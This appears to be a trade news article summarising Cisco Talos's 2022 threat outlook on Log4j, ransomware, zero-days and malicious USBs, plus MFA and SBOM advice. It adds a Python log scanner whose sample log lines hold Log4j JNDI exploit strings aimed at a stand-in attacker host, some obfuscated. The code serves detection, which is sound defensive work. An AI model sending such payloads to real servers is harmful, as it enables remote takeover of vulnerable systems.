Cisco IDs top 2022 security threats and what to do about them

Cisco Talos security experts view ransomware, Log4j, zero days, and even malicious USBs as ongoing challenges.

2022 will be another busy year for enterprise incident responders as ransomware, supply chain and myriad zero-day attacks will continue to rise, according to Cisco's Talos security experts.

To help address the threats, the Cisco Talos team used a blog and online presentation to detail steps enterprises can take to defend themselves against the growing field of bad actors and also to point out lessons learned from recent damaging exploits such as the Log4j vulnerability and Microsoft Exchange server zero-day threats.

Once, zero-day attacks were typically launched by state actors against service providers, but those days are gone, wrote Nick Biasini, head of outreach at Cisco Talos, in a blog on the 2022 security landscape. Now new, experienced combatants are using less surgical attacks to seek out a wider range of targets. "This has led to riskier behavior than we have seen historically, with little regard for collateral damage," he wrote.

These state actors have also changed their tactics. Rather than focusing only on espionage against other countries, they are now also targeting dissidents and activists with attacks designed to disrupt and destroy. Meanwhile, criminal enterprises have become a bigger threat thanks to the billions of dollars they can easily collect through cryptocurrency. "As defenders, we have never faced more challenges…" Biasini said.

Some of the biggest challenges for 2022 include ongoing problems such as Log4j and ransomware.

Unpatched Log4j still a threat

Log4j software is widely used in enterprise and consumer services, websites, and applications as an easy-to-use utility that supports client/server application development. But it has weaknesses that, if exploited, can let an unauthenticated remote actor take control of an affected server system and gain access to corporate information or launch denial-of-service attacks.

Cisco telemetry has detected attackers exploiting these weaknesses in vulnerable VMware Horizon servers and infecting them with malicious payloads, including Cobalt Strike, a tool designed to help penetration testers secure networks but also used by attackers, said Neil Jenkins, chief analytic officer of the Cyber Threat Alliance, in the online presentation. Despite warnings to patch Log4j, not everyone has done so, and "there are still threat actors, especially advanced threat actors, who may want to target these vulnerabilities in the future."

Cisco Talos said Log4j will continue to be widely exploited, so users should patch affected products as soon as possible and implement mitigations.
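One concrete way to act on the telemetry finding above is to look for Log4j lookup strings in your own web-server logs. The script below is an added example written for this article, not Cisco Talos tooling: it scans constructed access-log lines for the `${jndi:...}` lookup pattern that triggers the Log4j weakness, after URL-decoding and unwrapping the `${lower:...}`, `${upper:...}` and `${...:-default}` nesting commonly used to evade naive string matching. The log lines, IP addresses and the `attacker.example` host are all constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not real telemetry). Lines 2-4
# carry a JNDI lookup in the User-Agent or query string; line 5 carries a
# harmless non-JNDI lookup that a naive "${" match would flag.
LOGS = [
    '10.0.0.5 - - [10/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Jan/2022:10:00:03 +0000] "GET /?x=${${lower:j}${lower:n}di:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Jan/2022:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fc%7D"',
    '10.0.0.7 - - [10/Jan/2022:10:00:05 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# Innermost case-conversion lookups: ${lower:X} / ${upper:X} with no nested "${" inside.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost lookups with a default value: ${anything:-X} resolves to X when the key is unset.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup we are hunting for, once the nesting has been flattened.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL-encoding and flatten nested lookups from the inside out.

    The loop is bounded so a pathological line cannot spin forever; each pass
    resolves one layer of nesting, and we stop when a pass changes nothing.
    """
    text = unquote(unquote(text))  # two rounds handle double-encoded payloads
    for _ in range(10):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return (line_number, flattened_lookup) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(0)))
    return hits


if __name__ == "__main__":
    for number, lookup in find_jndi_lookups(LOGS):
        print(f"line {number}: {lookup}")
```

Lines 2, 3 and 4 are reported with the lookup flattened to its plain `${jndi:...}` form, while line 5 is not, because `${env:HOME}` is a lookup but not a JNDI one. Run it over real logs a file at a time; a hit tells you a lookup string reached a logging call, not that the server was vulnerable, so treat it as a lead for the patch and telemetry checks the article recommends.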

Ransomware still a scourge

With the exception of Q1, ransomware took up nearly 50% of all the threats that Talos tracked in 2021, thanks to the lure of lucrative payouts from ransomware victims. In turn, some of that cash will help ransomware cartels develop more sophisticated approaches. “As we saw with [supply chain attack] Kaseya, these cartels have the ability to purchase or develop zero-days to be leveraged in attacks, a trend that should concern us all and another reason why behavioral protection will continue to be an important aspect of detection in 2022 and beyond,” Biasini stated.

Another problem is the growing number of ransomware players. Early in 2021 many attacks came from a single group, but by the end of the year there were at least 13 different ones, Jenkins said.

“Even with one family, you have a lot of different affiliates who are using different tactics, so even with one dominant family, you can still see a diversification in the types of attacks and the types of tooling they’ll use,” Jenkins said.

There are other factors that could change the ransomware landscape—the US government’s anti-ransomware initiatives for one—as well as the scrutiny these groups are getting from law enforcement around the globe, Jenkins said. Larger ransomware groups might fragment to be less detectable, and open-source ransomware developers may have a more difficult time as some of their forums are shut down. As a result, the attackers might choose smaller targets to avoid the publicity and attention from law enforcement that larger attacks might draw, Jenkins said.

The best protection is to maintain cyberdefense best practices such as offline backups, multifactor authentication, and an incident response plan, Jenkins said.

Zero day is here to stay

There has been a dramatic increase in zero-day attacks, with more than 50 discovered in the wild during 2021—more than in all of 2019 and 2020 combined, Biasini stated.

Zero-days remain a rich source of attacks. At the recent Tianfu Cup hacking competition in China, there were no less than 30 successful exploits demonstrated against the short list of targets, including a handful that affected the latest versions of Windows and iOS. All of them were likely reported to the Chinese government because of recent regulatory changes there, which could have consequences, Biasini said. The latest example is Alibaba being penalized by the Chinese government for not disclosing Log4j to it in advance, he said.

Beware suspicious USBs

Another interesting development is the return of one of the oldest vulnerabilities in the security space: the use of malicious USB devices.

“Starting in 2021, even carrying into this year, there has been an uptick of malicious USBs used as a means of initial access, which is a true blast from the past,” Jenkins said. “But just a reminder that even these old, outdated attack vectors can still be used, and still have success.”

Enterprise best practices

Cisco Talos researchers did have recommendations for enterprise incident response.

Patching, inventory, segmentation, training, and having an incident response plan are all important, but Cisco's experts have one main recommendation: institute multifactor authentication. "We identified the lack of MFA as potentially one of the biggest barriers to enterprise security," Jenkins said. "MFA could have prevented many ransomware incidents. So we absolutely encourage you to roll out MFA wherever you can, especially on sensitive systems, as soon as possible."

Some other thoughts:

  • Keep an accurate asset inventory and current documentation and policies, especially as they relate to patching. These are fundamentals when it comes to incident response. "The last thing you want is to be in the middle of an active incident and discover that you don't have an accurate asset inventory, or that you haven't patched anything for six months. Making sure fundamentals such as network segmentation and proper access control are in place will limit the impact of a breach," Cisco said.
  • When considering software options, get a software bill of materials (SBOM) from the vendor. This should make it possible to quickly determine how a vulnerability in a specific library or open-source package changes day-to-day operations, and hopefully allow a more thorough and thoughtful response.
  • Plan based on the idea you will be breached at some point. Create a cybersecurity incident response plan that includes all the stakeholders in the process. During an incident, every minute counts, making it crucial that the appropriate departments are ready to make decisions and take actions so containment can happen as soon as possible. Preparing and practicing your processes related to an incident can make the difference between mitigating a compromised system and suffering a total breach.
  • Enable logging. This can be difficult and expensive, but when you are working an incident, having logging enabled is critical. Without it, you may never be able to determine things like the initial infection vector or patient zero. These failures can be catastrophic if multiple actors are able to abuse the same undetected weakness, Cisco said.
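The SBOM recommendation above is only useful if you can actually query the document when an advisory lands. The script below is an added example for this article, not a Cisco or vendor tool: it reads a constructed CycloneDX-style SBOM, flags components whose version falls below a fixed-in threshold, and walks the dependency graph upward to name the applications that would be affected, which is the "how does this library change day-to-day operations" question the bullet asks. The SBOM contents, the `ticketing-portal` application, its component names and the `2.17.1` threshold in the advisory table are all constructed for illustration; the real threshold comes from the vendor advisory you are acting on.

```python
import json
import re

# Constructed CycloneDX-style SBOM (illustrative; not a real vendor document).
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "metadata": {"component": {"bom-ref": "app", "type": "application",
                              "name": "ticketing-portal", "version": "3.2.0"}},
  "components": [
    {"bom-ref": "web", "type": "library", "group": "example.com", "name": "web-frontend", "version": "1.0.0"},
    {"bom-ref": "search", "type": "library", "group": "example.com", "name": "search-service", "version": "2.1.0"},
    {"bom-ref": "log4j-core", "type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1"},
    {"bom-ref": "log4j-api", "type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1"},
    {"bom-ref": "jackson", "type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind", "version": "2.13.1"}
  ],
  "dependencies": [
    {"ref": "app", "dependsOn": ["web", "search"]},
    {"ref": "web", "dependsOn": ["jackson"]},
    {"ref": "search", "dependsOn": ["log4j-core", "log4j-api"]},
    {"ref": "log4j-core", "dependsOn": ["log4j-api"]}
  ]
}
"""

# Constructed advisory table: (group, name, first fixed version). The version
# threshold is a placeholder for the value in the vendor's advisory.
ADVISORIES = [("org.apache.logging.log4j", "log4j-core", "2.17.1")]


def parse_version(version: str) -> tuple:
    """Turn a dotted version into a tuple of leading integers so tuples compare numerically."""
    parts = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        parts.append(int(match.group(0)) if match else 0)
    return tuple(parts)


def find_affected(sbom: dict, advisories) -> list:
    """Return the bom-refs of components older than the fixed version in any advisory."""
    hits = []
    for component in sbom.get("components", []):
        for group, name, fixed in advisories:
            if (component.get("group") == group and component.get("name") == name
                    and parse_version(component["version"]) < parse_version(fixed)):
                hits.append(component["bom-ref"])
    return hits


def dependents(sbom: dict, target: str) -> list:
    """Walk the dependency graph upward: everything that transitively depends on target."""
    reverse = {}
    for entry in sbom.get("dependencies", []):
        for child in entry.get("dependsOn", []):
            reverse.setdefault(child, set()).add(entry["ref"])
    seen, stack = set(), [target]
    while stack:
        ref = stack.pop()
        for parent in reverse.get(ref, ()):
            if parent not in seen:
                seen.add(parent)
                stack.append(parent)
    return sorted(seen)


def impact_report(sbom_json: str, advisories) -> dict:
    """Map each affected component to the components and applications that pull it in."""
    sbom = json.loads(sbom_json)
    return {ref: dependents(sbom, ref) for ref in find_affected(sbom, advisories)}


if __name__ == "__main__":
    for ref, users in impact_report(SBOM_JSON, ADVISORIES).items():
        print(f"{ref}: affects {', '.join(users)}")
```

On the constructed SBOM the report shows that the outdated `log4j-core` is reached only through `search-service`, and from there the `ticketing-portal` application, so the response can be scoped to that service rather than to every system that happens to ship the library. A real SBOM may list the same library several times under different bom-refs, which is exactly why the lookup keys on group and name rather than on the ref.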

Copyright © 2022 IDG Communications, Inc.